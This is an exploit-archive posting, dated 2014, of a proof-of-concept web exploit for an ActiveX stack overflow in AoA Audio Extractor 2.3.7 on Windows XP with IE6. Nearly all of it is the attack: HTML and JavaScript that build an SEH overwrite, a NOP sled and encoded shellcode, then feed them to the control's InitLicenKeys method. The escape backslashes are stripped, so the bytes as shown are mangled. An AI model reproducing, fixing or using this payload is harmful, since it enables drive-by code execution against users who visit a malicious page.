Home / exploits AoA Audio Extractor 2.3.7 Active-X Overflow
Posted on 20 May 2014
# Exploit Title: AoA Audio Extractor Basic ActiveX # Date: 19.05.2014 # Author: metacom # Website: www.rstforums.com # Software Link: www.aoamedia.com/audioextractor.exe # Version: 2.3.7 # Tested on: Windows xp sp3EN IE 6.0 <html> <object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' /></object> <script language='javascript'> nse="xEBx06xffxff"; seh="x58xE4x04x10"; nops="x90"; while (nops.length<10){ nops+="x90";} shellcode =( "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+ "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+ "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+ "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+ "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"+ "x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47"+ "x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38"+ "x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48"+ "x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"+ "x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"+ "x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58"+ "x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44"+ "x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38"+ "x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33"+ "x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47"+ "x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a"+ "x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b"+ "x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53"+ "x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57"+ "x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"+ "x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"+ "x4ex46x43x36x42x50x5a"); buffer1="x41"; buffer2="x42"; while (buffer1.length<2048){ buffer1+=buffer1;} buffer1=buffer1.substring(0,2048); buffer2=buffer1; while (buffer2.length<2048){ buffer2+=buffer2;} arg1=buffer1+nse+seh+nops+shellcode+buffer2; arg2="x52x53x54"; arg3="x52x53x54"; arg4="x52x53x54"; arg5="x52x53x54"; target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 ); </script> </html>
